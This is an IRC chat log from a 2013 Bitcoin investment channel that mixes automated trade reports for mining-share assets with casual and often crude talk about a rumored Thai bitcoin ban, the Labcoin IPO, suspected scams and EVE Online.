[BTCTC] [ACTIVEMINING] 25 @ 0.008089 = 0.2022 BTC [-] Jul 30 15:56:16 [BTCTC] [ACTIVEMINING] 475 @ 0.00809 = 3.8428 BTC [+] Jul 30 16:02:37 [BTCTC] [ACTIVEMINING] 25 @ 0.008075 = 0.2019 BTC [-] Jul 30 16:02:39 [BTCTC] [ACTIVEMINING] 25 @ 0.008076 = 0.2019 BTC [+] Jul 30 16:02:41 [BTCTC] [ACTIVEMINING] 25 @ 0.00808 = 0.202 BTC [+] Jul 30 16:02:43 [BTCTC] [ACTIVEMINING] 50 @ 0.00808 = 0.404 BTC [+] Jul 30 16:03:55 [BTCTC] [ASICMINER-PT] 2 @ 4.41 = 8.82 BTC [+] Jul 30 16:05:07 [BTCTC] [DMS.MINING] 6 @ 0.009894 = 0.0594 BTC [+] Jul 30 16:05:09 [BTCTC] [DMS.SELLING] 6 @ 0.02169 = 0.1301 BTC [+] Jul 30 16:08:25 [BTCTC] [ACTIVEMINING] 25 @ 0.008098 = 0.2025 BTC [+] Jul 30 16:08:27 [BTCTC] [ACTIVEMINING] 487 @ 0.008099 = 3.9442 BTC [+] Jul 30 16:09:47 [BTCTC] [ACTIVEMINING] 12 @ 0.008 = 0.096 BTC [-] Jul 30 16:09:48 [BTCTC] [ACTIVEMINING] 25 @ 0.007999 = 0.2 BTC [-] Jul 30 16:09:50 [BTCTC] [ACTIVEMINING] 12 @ 0.007936 = 0.0952 BTC [-] Jul 30 16:09:52 [BTCTC] [ACTIVEMINING] 193 @ 0.007904 = 1.5255 BTC [-] Jul 30 16:09:53 [BTCTC] [ACTIVEMINING] 120 @ 0.007903 = 0.9484 BTC [-] Jul 30 16:10:50 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [+] Jul 30 16:14:57 [MPEX] [S.MG] 13829 @ 0.0002675 = 3.6993 BTC [+] Jul 30 16:15:18 [BTCTC] [ACTIVEMINING] 600 @ 0.00805 = 4.83 BTC [+] Jul 30 16:16:47 [BTCTC] [ACTIVEMINING] 7150 @ 0.008 = 57.2 BTC [-] Jul 30 16:17:34 [BTCTC] [ACTIVEMINING] 530 @ 0.008095 = 4.2904 BTC [+] Jul 30 16:17:37 [BTCTC] [ACTIVEMINING] 10 @ 0.008096 = 0.081 BTC [+] Jul 30 16:17:38 [BTCTC] [ACTIVEMINING] 50 @ 0.008099 = 0.405 BTC [+] Jul 30 16:18:06 [BTCTC] [ACTIVEMINING] 25 @ 0.008099 = 0.2025 BTC [+] Jul 30 16:18:23 [BTCTC] [TAT.MINIGAME] 1 @ 0.000297 BTC [+] Jul 30 16:19:41 [BTCTC] [ACTIVEMINING] 50 @ 0.007906 = 0.3953 BTC [-] Jul 30 16:19:42 [BTCTC] [BFMINES] 100 @ 0.004 = 0.4 BTC [+] Jul 30 16:19:44 [BTCTC] [ACTIVEMINING] 1 @ 0.007906 BTC [-] Jul 30 16:19:46 [BTCTC] [ACTIVEMINING] 150 @ 0.007906 = 1.1859 BTC [-] Jul 30 16:19:50 [BTCTC] [ACTIVEMINING] 100 @ 0.007904 = 0.7904 BTC [-] Jul 30 16:19:52 [BTCTC] [ACTIVEMINING] 125 @ 0.00761 = 0.9513 BTC [-] Jul 30 16:19:53 [HAVELOCK] [SDSTM] 24 @ 0.0081114 = 0.1947 BTC [-] Jul 30 16:20:22 [HAVELOCK] [HIM] 1 @ 0.1939 BTC [+] Jul 30 16:21:40 [HAVELOCK] [SDSTM] 5 @ 0.0081114 = 0.0406 BTC [-] Jul 30 16:22:01 [HAVELOCK] [AM100] 1 @ 0.042 BTC [+] Jul 30 16:23:43 [BTCTC] [ACTIVEMINING] 25 @ 0.007889 = 0.1972 BTC [+] Jul 30 16:24:19 [BTCTC] [ACTIVEMINING] 125 @ 0.00789 = 0.9863 BTC [+] Jul 30 16:25:17 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [+] Jul 30 16:25:44 [BTCTC] [ACTIVEMINING] 50 @ 0.007904 = 0.3952 BTC [+] Jul 30 16:26:33 [BTCTC] [TAT.MINIGAME] 3511 @ 0.000297 = 1.0428 BTC [+] Jul 30 16:27:18 [BTCTC] [BTC-BOND] 60 @ 0.009998 = 0.5999 BTC [+] Jul 30 16:27:22 [BTCTC] [TAT.VIRTUALMINE] 17 @ 0.002324 = 0.0395 BTC [-] Jul 30 16:27:44 [BTCTC] [TAT.ASICMINER] 5 @ 0.04319 = 0.216 BTC [-] Jul 30 16:27:56 [BTCTC] [TAT.MINIGAME] 1 @ 0.000301 BTC [+] Jul 30 16:28:03 [BTCTC] [TAT.MINIGAME] 741 @ 0.000303 = 0.2245 BTC [+] Jul 30 16:28:06 [BTCTC] [TAT.MINIGAME] 5000 @ 0.0003075 = 1.5375 BTC [+] Jul 30 16:28:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.043 = 0.086 BTC [-] Jul 30 16:28:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.04241 BTC [-] Jul 30 16:28:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.0424 = 0.0848 BTC [-] Jul 30 16:28:52 [BTCTC] [TAT.ASICMINER] 61 @ 0.0423 = 2.5803 BTC [-] Jul 30 16:32:57 [MPEX] [S.MPOE] 7985 @ 0.00080753 = 6.4481 BTC [+] Jul 30 16:34:38 [BTCTC] [ACTIVEMINING] 25 @ 0.007901 = 0.1975 BTC [-] Jul 30 16:34:42 [BTCTC] [ACTIVEMINING] 15 @ 0.0079 = 0.1185 BTC [-] Jul 30 16:34:44 [BTCTC] [ACTIVEMINING] 35 @ 0.007894 = 0.2763 BTC [-] Jul 30 16:35:32 [BTCTC] [ACTIVEMINING] 25 @ 0.007895 = 0.1974 BTC [+] Jul 30 16:35:35 [BTCTC] [ACTIVEMINING] 15 @ 0.007894 = 0.1184 BTC [-] Jul 30 16:35:40 [BTCTC] [ACTIVEMINING] 15 @ 0.00837 = 0.1256 BTC [+] Jul 30 16:35:42 [BTCTC] [ACTIVEMINING] 10 @ 0.008382 = 0.0838 BTC [+] Jul 30 16:36:23 [BTCTC] [ACTIVEMINING] 15 @ 0.0079 = 0.1185 BTC [-] Jul 30 16:36:25 [BTCTC] [ACTIVEMINING] 1 @ 0.007892 BTC [-] Jul 30 16:41:27 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [+] Jul 30 16:41:29 [BTCTC] [ASICMINER-PT] 1 @ 4.401 BTC [-] Jul 30 16:45:33 [BTCTC] [TAT.ASICMINER] 4 @ 0.04319 = 0.1728 BTC [+] Jul 30 16:46:12 [BTCTC] [TAT.ASICMINER] 16 @ 0.04319 = 0.691 BTC [+] Jul 30 16:46:32 [BTCTC] [ACTIVEMINING] 125 @ 0.00789 = 0.9863 BTC [-] Jul 30 16:46:34 [BTCTC] [ACTIVEMINING] 5 @ 0.00789 = 0.0395 BTC [-] Jul 30 16:46:42 [BTCTC] [ACTIVEMINING] 6 @ 0.00789 = 0.0473 BTC [-] Jul 30 16:47:39 [BTCTC] [ACTIVEMINING] 25 @ 0.008349 = 0.2087 BTC [+] Jul 30 16:48:30 [BTCTC] [ACTIVEMINING] 127 @ 0.008348 = 1.0602 BTC [-] Jul 30 16:48:34 [MPEX] [S.MPOE] 5933 @ 0.00080888 = 4.7991 BTC [+] Jul 30 16:48:36 [MPEX] [S.MPOE] 767 @ 0.00080739 = 0.6193 BTC [-] Jul 30 16:48:48 and now it's on slashdot. http://yro.slashdot.org/story/13/07/30/1228217/thailand-government-declares-bitcoin-illegal Jul 30 16:49:10 [BTCTC] [ACTIVEMINING] 10 @ 0.00834 = 0.0834 BTC [-] Jul 30 16:49:22 [BTCTC] [DMS.MINING] 2 @ 0.00912 = 0.0182 BTC [-] Jul 30 16:49:57 several tech sites picked it up Jul 30 16:50:11 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.002588 = 0.0104 BTC [+] Jul 30 16:50:22 I've seen, a popular French one too Jul 30 16:50:42 CoinLenders: "CoinLenders is not a bank or financial institution. This is not an investment, and CoinLenders does not solicit investments from anyone. All uses of 'BTC' on this website are for illustration only and do not represent any 'virtual currency' such as Bitcoin." Jul 30 16:50:44 [BTCTC] [TAT.ASICMINER] 9 @ 0.04319 = 0.3887 BTC [+] Jul 30 16:50:52 followed by the usual "I have no clue what bitcoin is but here is my opinion" comments Jul 30 16:51:05 [BTCTC] [ACTIVEMINING] 8 @ 0.007955 = 0.0636 BTC [-] Jul 30 16:51:10 wtf Jul 30 16:51:35 yeah COIN LENDERS does not LEND COINS Jul 30 16:51:42 [BTCTC] [ACTIVEMINING] 40 @ 0.008299 = 0.332 BTC [+] Jul 30 16:51:43 lol Jul 30 16:51:49 They just borrowed the idea Jul 30 16:51:53 haha Jul 30 16:52:11 how do i win this game? Jul 30 16:52:23 [BTCTC] [DMS.MINING] 150 @ 0.00912 = 1.368 BTC [-] Jul 30 16:52:54 [BTCTC] [ACTIVEMINING] 222 @ 0.008 = 1.776 BTC [-] Jul 30 16:54:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.04319 = 0.1296 BTC [+] Jul 30 16:56:51 [BTCTC] [COGNITIVE] 1 @ 0.51 BTC [+] Jul 30 16:57:56 [BTCTC] [TAT.MINIGAME] 1315 @ 0.000315 = 0.4142 BTC [+] Jul 30 16:58:41 [BTCTC] [DMS.MINING] 16 @ 0.00912 = 0.1459 BTC [-] Jul 30 16:59:07 [BTCTC] [BASIC-MINING] 2 @ 0.4784 = 0.9568 BTC [+] Jul 30 17:00:20 [MPEX] [S.MG] 10000 @ 0.0002675 = 2.675 BTC [+] Jul 30 17:01:55 So my bfmines shares might finally move Jul 30 17:02:13 [MPEX] [S.MPOE] 9156 @ 0.00080739 = 7.3925 BTC [-] Jul 30 17:02:30 [BTCTC] [ACTIVEMINING] 295 @ 0.007962 = 2.3488 BTC [-] Jul 30 17:02:31 2 weeks? Jul 30 17:02:44 yeah Jul 30 17:02:45 lol Jul 30 17:03:12 "Today, Metabank has received the chips from Bitfury to start building the first miners used to back BFMines. According to an update from one of their customers, there are some issues with getting power supply units, but Metabank still expects to ship miners within two weeks. " Jul 30 17:03:58 Them and labcoin are on my watch Jul 30 17:05:23 [BTCTC] [ACTIVEMINING] 139 @ 0.007999 = 1.1119 BTC [+] Jul 30 17:05:32 [BTCTC] [ACTIVEMINING] 278 @ 0.008 = 2.224 BTC [+] Jul 30 17:07:07 PSUs = 2 weeks Jul 30 17:07:48 is labcoin worth of a million dollar valuation right now? Jul 30 17:07:52 worthy Jul 30 17:07:54 obv Jul 30 17:07:58 trying to work it out before Jul 30 17:08:14 this will be fun, Jul 30 17:08:17 I think they have a better plan then Active Jul 30 17:08:21 than* Jul 30 17:08:22 ActM will crash Jul 30 17:08:27 yeah Jul 30 17:08:27 so people can pump lab Jul 30 17:08:31 lolz Jul 30 17:08:37 Basically what I'm going to do lol Jul 30 17:08:44 [BTCTC] [BTC-BOND] 20 @ 0.009998 = 0.2 BTC [+] Jul 30 17:08:45 think you're on the money with that one Jul 30 17:08:48 miners are the new altcoins Jul 30 17:09:01 any asset really Jul 30 17:09:05 look at sandstorm Jul 30 17:09:21 that's small potatoes Jul 30 17:09:41 that was an insane pump tho Jul 30 17:09:45 x20 profits Jul 30 17:10:00 not for everyone Jul 30 17:10:38 [BTCTC] [ACTIVEMINING] 88 @ 0.008245 = 0.7256 BTC [+] Jul 30 17:10:40 [BTCTC] [ACTIVEMINING] 32 @ 0.008245 = 0.2638 BTC [+] Jul 30 17:11:05 so uh you guys gon get some labcoin ipo shares? Jul 30 17:11:30 isnt everyone? Jul 30 17:11:54 i wasn't going to Jul 30 17:12:04 because cmon, million dollar valuation Jul 30 17:12:15 but may as well join the party of the sick demented animals Jul 30 17:12:22 they are working on 130nm Jul 30 17:12:25 high-tech Jul 30 17:12:27 [BTCTC] [ACTIVEMINING] 27 @ 0.008245 = 0.2226 BTC [+] Jul 30 17:12:54 yeah but when you do a ipo you got to value the company what its worth today Jul 30 17:13:03 0 Jul 30 17:13:05 ? Jul 30 17:13:10 exactly Jul 30 17:13:16 maybe 1grand? Jul 30 17:13:37 [BTCTC] [ACTIVEMINING] 86 @ 0.008244 = 0.709 BTC [-] Jul 30 17:13:39 [BTCTC] [ACTIVEMINING] 277 @ 0.008245 = 2.2839 BTC [+] Jul 30 17:13:40 [BTCTC] [ACTIVEMINING] 250 @ 0.008247 = 2.0618 BTC [+] Jul 30 17:13:42 [BTCTC] [ACTIVEMINING] 42 @ 0.008295 = 0.3484 BTC [+] Jul 30 17:13:43 [BTCTC] [ACTIVEMINING] 126 @ 0.008297 = 1.0454 BTC [+] Jul 30 17:13:45 [BTCTC] [ACTIVEMINING] 127 @ 0.008398 = 1.0665 BTC [+] Jul 30 17:13:46 [BTCTC] [ACTIVEMINING] 250 @ 0.008399 = 2.0998 BTC [+] Jul 30 17:13:47 [BTCTC] [ACTIVEMINING] 1000 @ 0.0084 = 8.4 BTC [+] Jul 30 17:13:48 [BTCTC] [ACTIVEMINING] 500 @ 0.0084 = 4.2 BTC [+] Jul 30 17:13:59 yeah its hard to not join the party hey Jul 30 17:14:02 There's always money to be made in the beginning Jul 30 17:14:15 until there isnt Jul 30 17:14:20 so uh you guys gon get some labcoin ipo shares? << no. Jul 30 17:14:21 Well yeah Jul 30 17:14:26 this because we're not retarded. Jul 30 17:14:50 heh Jul 30 17:14:53 mp doesnt like gems i guess Jul 30 17:15:19 I would like some more pics/videos of their office though. Jul 30 17:15:22 maybe they have some good history i dont know Jul 30 17:15:27 i just looked at the figured Jul 30 17:15:30 s Jul 30 17:15:39 I feel like Active didn't really give shit in that area but yet has so many cultists that followed it Jul 30 17:15:44 maybe they shit plums. Jul 30 17:15:56 okey cool, glad to confirm that Jul 30 17:16:32 i thought i was crazy for thinking "get the fuck outta here with a million dollar valuation, with no sales" Jul 30 17:16:36 Active showed pics Jul 30 17:16:50 they have cases Jul 30 17:16:53 and a PSU Jul 30 17:16:56 and a CRT Jul 30 17:16:59 Yeah a cheap desk Jul 30 17:17:02 dot matrix? Jul 30 17:17:47 [BTCTC] [COGNITIVE] 1 @ 0.51 BTC [+] Jul 30 17:17:52 And labcoin has 3 pictures online lol Jul 30 17:18:06 Actually shows shit, but if it's actually their office /shrug Jul 30 17:18:08 BTCGarden has nerdier pics Jul 30 17:18:10 they win Jul 30 17:18:14 and they speak chinese Jul 30 17:18:16 sooooooo Jul 30 17:18:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0423 BTC [-] Jul 30 17:18:30 [HAVELOCK] [AM1] 1 @ 4.579 BTC [-] Jul 30 17:18:33 [BTCTC] [TAT.ASICMINER] 2 @ 0.0423 = 0.0846 BTC [-] Jul 30 17:18:34 [BTCTC] [TAT.ASICMINER] 20 @ 0.0423 = 0.846 BTC [-] Jul 30 17:18:36 [BTCTC] [TAT.ASICMINER] 50 @ 0.0423 = 2.115 BTC [-] Jul 30 17:18:45 anyone else bankrolling just-dice? Jul 30 17:18:57 nope Jul 30 17:19:39 i really don't understandf this entire picture thing. Jul 30 17:19:54 basically these people are the same people being scammed by russian brides or wtf. Jul 30 17:20:10 [BTCTC] [ASICMINER-PT] 1 @ 4.331 BTC [-] Jul 30 17:20:55 people are only okay with scams if you make an effort Jul 30 17:21:21 i think you're pretty much right. Jul 30 17:21:26 vegas mentality. Jul 30 17:22:22 1btc? Jul 30 17:22:36 How much Jul 30 17:22:43 [BTCTC] [TAT.ASICMINER] 37 @ 0.0423 = 1.5651 BTC [-] Jul 30 17:22:54 You cashing out? Jul 30 17:23:42 [BTCTC] [TAT.ASICMINER] 38 @ 0.0423 = 1.6074 BTC [-] Jul 30 17:23:49 cant be much left after that Jul 30 17:24:38 [BTCTC] [ACTIVEMINING] 70 @ 0.008488 = 0.5942 BTC [+] Jul 30 17:25:28 [MPEX] [S.MPOE] 1144 @ 0.00080517 = 0.9211 BTC [-] Jul 30 17:25:30 [MPEX] [S.MPOE] 4006 @ 0.00080902 = 3.2409 BTC [+] Jul 30 17:28:39 "While planning this trip I also tried to meet up with Ken but I arrived the day he was leaving I believe. However, one of the bitcoiners that I knew up here who wishes to remain anonymous is also a Silicon-Valley based engineer and in my opinion very well versed in the world of ASICs, was able to meet up with Ken for me. Jul 30 17:28:40 I asked him to give me an overview of how he felt about Ken and the ASIC project he is working on in a nutshell. He confirmed with me that Ken is the real deal and that based on the conversation that was had, he doesn’t see any reason to think otherwise. Jul 30 17:28:40 Now I know this might not sound like much but in my opinion if Ken can make this particular Engineer come to this conclusion then us shareholders should be in a very good position. Jul 30 17:28:40 I’ll leave it at that and if Ken reads this he can confirm that he did indeed have a meeting with the Engineer on Friday. Jul 30 17:28:40 This is looking even better guys!" Jul 30 17:29:10 I really Jul 30 17:29:16 Dont understand how people buy this Jul 30 17:29:30 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002451 BTC [-] Jul 30 17:29:38 There's a lot of beating around the bush Jul 30 17:29:53 the bush is covered in bullshit Jul 30 17:30:47 [BTCTC] [ASICMINER-PT] 1 @ 4.395 BTC [+] Jul 30 17:31:46 [BTCTC] [ASICMINER-PT] 2 @ 4.398 = 8.796 BTC [+] Jul 30 17:32:40 What do you guys think the diff will be in Oct? Jul 30 17:32:56 [BTCTC] [ASICMINER-PT] 12 @ 4.399 = 52.788 BTC [+] Jul 30 17:34:03 sooo china just dumped a ton of more douigh into the mkt Jul 30 17:34:09 ;;ticker Jul 30 17:34:10 MtGox BTCUSD ticker | Best bid: 102.03502, Best ask: 102.48594, Bid-ask spread: 0.45092, Last trade: 102.03500, 24 hour volume: 14929.69317619, 24 hour low: 100.41000, 24 hour high: 103.00000, 24 hour vwap: 101.46817 Jul 30 17:34:21 i'm thinking 108 soon Jul 30 17:34:29 very well versed in the magical world of asics. Jul 30 17:35:03 labcoin could just be an avalon group buy with a costume on Jul 30 17:35:07 fucktards. "this particular engineer" can never be said about "anonymous" Jul 30 17:35:26 hip Specs: Multi-core 130 nm chip with power consumption of: 2.7 w/Ghash. Each chip runs at 4.7 GH/s @ 12.8W Jul 30 17:35:26 Chip estimated cost (full production run post First-run): $9-$10 USD per chip or $2 per GH Jul 30 17:35:27 let me tell you a little story. Jul 30 17:35:42 how is that cost worth it as a manufacturer Jul 30 17:35:45 a guy with down syndrome got better marks on the national examination thios summer Jul 30 17:35:49 than 2/3 of all the kids. Jul 30 17:37:36 also, if anyone's in for a little lolz : while scanning the e.d.tex lawyerbase i stumbled upon the guy that's going to represent pirate. Jul 30 17:37:44 Rulother_: jurov thinks 75M in sept https://bitfunder.com/asset/CoinBr.iDiff-O Jul 30 17:38:11 jurov sold a bunch at 69 first Jul 30 17:38:26 [BTCTC] [ACTIVEMINING] 17 @ 0.008481 = 0.1442 BTC [-] Jul 30 17:38:35 Hmmm Jul 30 17:38:56 mircea_popescu: share the lulz Jul 30 17:39:07 [HAVELOCK] [AM100] 4 @ 0.042 = 0.168 BTC [+] Jul 30 17:39:09 [HAVELOCK] [AM100] 50 @ 0.042 = 2.1 BTC [+] Jul 30 17:39:30 TomServo well that was it. Jul 30 17:40:10 so alot of se/asia countries bitcoin will be illegal there soon Jul 30 17:40:15 its pretty lul Jul 30 17:40:20 except its not illegal anywhere in asia Jul 30 17:40:23 not even thailand Jul 30 17:40:28 so I wish people would quit bullshitting Jul 30 17:40:36 i got tech reporters from singapore messaging me lol Jul 30 17:40:49 tell them to eat a bag of dicks and check their sources next time Jul 30 17:41:02 yeah. right. tell people to stop bullshittingh Jul 30 17:41:03 i told them its going to be banned in singapore next Jul 30 17:41:05 that's going to work. Jul 30 17:41:10 [BTCTC] [TAT.MINIGAME] 950 @ 0.000308 = 0.2926 BTC [-] Jul 30 17:41:12 [BTCTC] [TAT.MINIGAME] 5000 @ 0.000314 = 1.57 BTC [+] Jul 30 17:41:14 [BTCTC] [TAT.MINIGAME] 2500 @ 0.000319 = 0.7975 BTC [+] Jul 30 17:41:30 think* Jul 30 17:41:47 thailand doesnt even know what the fuck the internet is Jul 30 17:41:49 let alone bitcoin Jul 30 17:41:50 [BTCTC] [COGNITIVE] 1 @ 0.535 BTC [+] Jul 30 17:41:50 [BTCTC] [COGNITIVE] 1 @ 0.535 BTC [+] Jul 30 17:41:51 yeah i know buts its spreading virally that it is Jul 30 17:41:59 and other se/asian countries are freaking out Jul 30 17:42:07 I think the winklevosii started the rumor Jul 30 17:42:18 so they can buy btc cheap Jul 30 17:42:29 they'd need money for that. Jul 30 17:42:29 singapore, vietnam, all freakingout Jul 30 17:42:39 [MPEX] [S.MG] 3480 @ 0.0002675 = 0.9309 BTC [+] Jul 30 17:43:02 what have you started chaang-noi :) Jul 30 17:43:44 you got people in singapore shitting their panties Jul 30 17:44:20 haha Jul 30 17:47:23 [BTCTC] [TAT.VIRTUALMINE] 18 @ 0.002576 = 0.0464 BTC [+] Jul 30 17:47:25 [BTCTC] [TAT.VIRTUALMINE] 51 @ 0.002577 = 0.1314 BTC [+] Jul 30 17:47:27 [BTCTC] [TAT.VIRTUALMINE] 96 @ 0.002588 = 0.2484 BTC [+] Jul 30 17:47:28 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.002688 = 0.0134 BTC [+] Jul 30 17:47:30 [BTCTC] [TAT.VIRTUALMINE] 32 @ 0.00269 = 0.0861 BTC [+] Jul 30 17:47:31 [BTCTC] [TAT.VIRTUALMINE] 170 @ 0.002699 = 0.4588 BTC [+] Jul 30 17:47:33 [BTCTC] [TAT.VIRTUALMINE] 629 @ 0.0027 = 1.6983 BTC [+] Jul 30 17:48:08 they're all bribable anyway Jul 30 17:48:13 not like here Jul 30 17:48:54 mircea_popescu: so who's his lawyer? Jul 30 17:49:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.04252 BTC [+] Jul 30 17:50:44 jurov sold a bunch at 69 first << lol, as if you didn't knew who bought them :P Jul 30 17:51:07 [BTCTC] [TAT.ASICMINER] 64 @ 0.04319 = 2.7642 BTC [+] Jul 30 17:51:51 who was it? Jul 30 17:51:59 :) Jul 30 17:52:05 lol Jul 30 17:52:27 Damn usagi got the shaft hard on btct lol Jul 30 17:53:00 [HAVELOCK] [SMG] 500 @ 0.0002698 = 0.1349 BTC [-] Jul 30 17:53:31 [HAVELOCK] [SMG] 3 @ 0.0002698 = 0.0008 BTC [-] Jul 30 17:53:55 TomServo well that';d be going too far for nao. Jul 30 17:54:06 Anonymous voted NO with comment: untrustworthy manager Jul 30 17:54:07 Anonymous voted NO with comment: Issuer has a poor track record. Jul 30 17:54:07 BTCTRADINGPT voted NO with comment: BTC-TRADING-PT shareholders voted to not approve: 528-0 Jul 30 17:54:07 Anonymous voted NO with comment: Issuer has proven to be unreliable and untrustworthy in the past. Jul 30 17:54:07 Anonymous voted NO with comment: Extremely untrustworthy asset issuer. Jul 30 17:54:14 smidge are you the dude with the fund ? Jul 30 17:54:14 Usagi Silver ^ Jul 30 17:54:32 528-0 lol Jul 30 17:55:03 Damn damn lol Jul 30 17:55:18 i think the issuer does all the votes himself Jul 30 17:55:21 o could bne wrong Jul 30 17:55:23 i Jul 30 17:55:25 mircea yea, but youre not on a first name basis fo sho Jul 30 17:55:26 :) Jul 30 17:55:32 [BTCTC] [ACTIVEMINING] 1 @ 0.00807 BTC [-] Jul 30 17:55:47 if your parents actually baptised you smidge... Jul 30 17:55:54 lol Jul 30 17:56:12 ThickAsThieves is that namworld's thing ? Jul 30 17:56:16 no Jul 30 17:56:22 John Galt I think? Jul 30 17:56:25 people need to stop with the btc-coin-fuckmealready Jul 30 17:56:30 i can't distinguish anything Jul 30 17:56:53 name shit smidge. at least that's memorable. Jul 30 17:57:11 [BTCTC] [TAT.MINIGAME] 6 @ 0.000325 = 0.002 BTC [+] Jul 30 17:58:21 there u go Jul 30 17:58:41 speaking about s… names Jul 30 17:58:44 smickles! Jul 30 17:58:50 still no email from you :( Jul 30 17:59:12 NO EMAIL FOR YOU COME BACK 1 YEAR Jul 30 17:59:23 ;;email Jul 30 17:59:24 Error: "email" is not a valid command. Jul 30 17:59:27 ;;mail Jul 30 17:59:27 Error: "mail" is not a valid command. Jul 30 17:59:33 !email Jul 30 17:59:41 :( Jul 30 17:59:49 a shutup Jul 30 17:59:49 !mail Jul 30 18:00:13 kakobrekla: i just wanted some more bread :( Jul 30 18:00:23 [BTCTC] [ACTIVEMINING] 125 @ 0.008399 = 1.0499 BTC [+] Jul 30 18:00:44 come by and ill give you some Jul 30 18:01:48 so apparently i've spent something like 5bn isk this month Jul 30 18:02:08 whats that half a btc? Jul 30 18:02:15 ju7st about Jul 30 18:02:45 [HAVELOCK] [AM100] 9 @ 0.042 = 0.378 BTC [+] Jul 30 18:02:49 however the bitcoin eve corporation is going to have a POS. Jul 30 18:03:46 I am not into EVE, I did read about a ambush that took out a super carrier? worth about $9000 < that sound correct? Jul 30 18:04:02 i doubtr it's that much, but anyway. Jul 30 18:04:20 that is why I asked, you know how the news is Jul 30 18:04:28 im kinda clueless myself Jul 30 18:04:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.04252 BTC [-] Jul 30 18:04:48 only started recently, coupla weeks Jul 30 18:04:48 lol mircea, I started eve in jan and just learned flying a tengu Jul 30 18:04:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.04252 BTC [-] Jul 30 18:04:50 [BTCTC] [TAT.ASICMINER] 21 @ 0.0423 = 0.8883 BTC [-] Jul 30 18:04:53 [BTCTC] [TAT.ASICMINER] 12 @ 0.0423 = 0.5076 BTC [-] Jul 30 18:04:58 The article said it was one of only 3 of that class of ship Jul 30 18:05:05 i'm in a navy raven. Jul 30 18:05:11 [BTCTC] [BASIC-MINING] 20 @ 0.4211 = 8.422 BTC [-] Jul 30 18:05:12 I've been thinking about starting Eve, does the eve bitcoin corp accept noobs? Jul 30 18:05:17 [MPEX] [S.BBET] 83 @ 0.00099999 = 0.083 BTC [-] Jul 30 18:05:20 hollywoodundead o yeah, i recall, some stuff about evil spies and whatnot Jul 30 18:05:21 ok, i sent smickles another email Jul 30 18:05:22 [BTCTC] [BASIC-MINING] 3 @ 0.4211 = 1.2633 BTC [-] Jul 30 18:05:24 [BTCTC] [BASIC-MINING] 1 @ 0.421 BTC [-] Jul 30 18:05:27 [BTCTC] [BASIC-MINING] 5 @ 0.421 = 2.105 BTC [-] Jul 30 18:05:29 [BTCTC] [BASIC-MINING] 1 @ 0.421 BTC [-] Jul 30 18:05:29 i bought eve on sale, but have yet to load it Jul 30 18:05:31 [BTCTC] [BASIC-MINING] 24 @ 0.42 = 10.08 BTC [-] Jul 30 18:05:34 [BTCTC] [BASIC-MINING] 1 @ 0.42 BTC [-] Jul 30 18:05:38 if he doesn't respond ... Jul 30 18:05:41 yeah, it was a long time double agent Jul 30 18:05:53 TomServo yeah Jul 30 18:05:54 i'll have to vote on your web-of-scammers page Jul 30 18:05:57 [BTCTC] [BASIC-MINING] 1 @ 0.4211 BTC [+] Jul 30 18:06:03 mircea you wont believe it, i almost didnt leave jita since then because ive been trading all the time. turned 25m into 1.2b between jan and april. im not kidding :) Jul 30 18:06:16 read up this thing http://trilema.com/2013/bitcoins-eve-corporation/ and come on by. Jul 30 18:06:35 That's what got me interested. :) Jul 30 18:06:48 hehe cool Jul 30 18:06:52 smidge why'd you be kidding ? Jul 30 18:07:03 not too hard to turn an isk trading Jul 30 18:07:20 well it takes time Jul 30 18:07:39 and u need to find high margin products with high turnover Jul 30 18:07:49 ideally. Jul 30 18:07:58 how many hours is that, jan to april ? Jul 30 18:08:06 usually its only one of the criteria Jul 30 18:08:37 quit my job end of jan, started new one beginning of april, so quite a lot of hours :) Jul 30 18:08:45 about 3-4 net per day Jul 30 18:09:03 [BTCTC] [ASICMINER-PT] 1 @ 4.398 BTC [-] Jul 30 18:09:10 yeah well that'd be a problem then, because 1bn over 500 hours comes to 2mn/hr Jul 30 18:09:21 missioning is 5ish even for a noob Jul 30 18:09:21 1.2b cash, plus i bought ships etc. like the tengu. estimated 1.5b. friend gave me 25m net Jul 30 18:09:53 its not 500 hrs Jul 30 18:10:16 plus, i like trading more than missions Jul 30 18:11:05 4-5 months of 30 days of 4 hours is what. 500. Jul 30 18:12:13 its 2 months Jul 30 18:12:25 then uit's just about par. Jul 30 18:12:33 game's remarkably balanced in this respect. Jul 30 18:13:15 Have any of you tried dust? Jul 30 18:13:27 yes it is Jul 30 18:13:27 [BTCTC] [TAT.ASICMINER] 32 @ 0.04268 = 1.3658 BTC [+] Jul 30 18:13:29 [BTCTC] [TAT.ASICMINER] 14 @ 0.0427 = 0.5978 BTC [+] Jul 30 18:13:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.04274 BTC [+] Jul 30 18:13:36 i haven't, don;'t carfe for consoles much Jul 30 18:13:51 I really like the idea of it, but I don't have a ps3 Jul 30 18:14:07 [HAVELOCK] [AM100] 1 @ 0.0419 BTC [-] Jul 30 18:14:18 what's the idea of it ? Jul 30 18:14:35 [BTCTC] [BASIC-MINING] 179 @ 0.4147 = 74.2313 BTC [-] Jul 30 18:14:39 [BTCTC] [BASIC-MINING] 66 @ 0.4142 = 27.3372 BTC [-] Jul 30 18:14:51 [BTCTC] [ACTIVEMINING] 22 @ 0.008387 = 0.1845 BTC [-] Jul 30 18:14:52 http://en.wikipedia.org/wiki/Dust_514 Jul 30 18:14:53 [BTCTC] [ASICMINER-PT] 1 @ 4.345 BTC [-] Jul 30 18:14:54 [BTCTC] [ACTIVEMINING] 50 @ 0.008388 = 0.4194 BTC [+] Jul 30 18:14:56 [BTCTC] [ASICMINER-PT] 1 @ 4.34 BTC [-] Jul 30 18:14:57 [BTCTC] [ACTIVEMINING] 28 @ 0.00839 = 0.2349 BTC [+] Jul 30 18:15:00 [BTCTC] [ASICMINER-PT] 1 @ 4.331 BTC [-] Jul 30 18:15:11 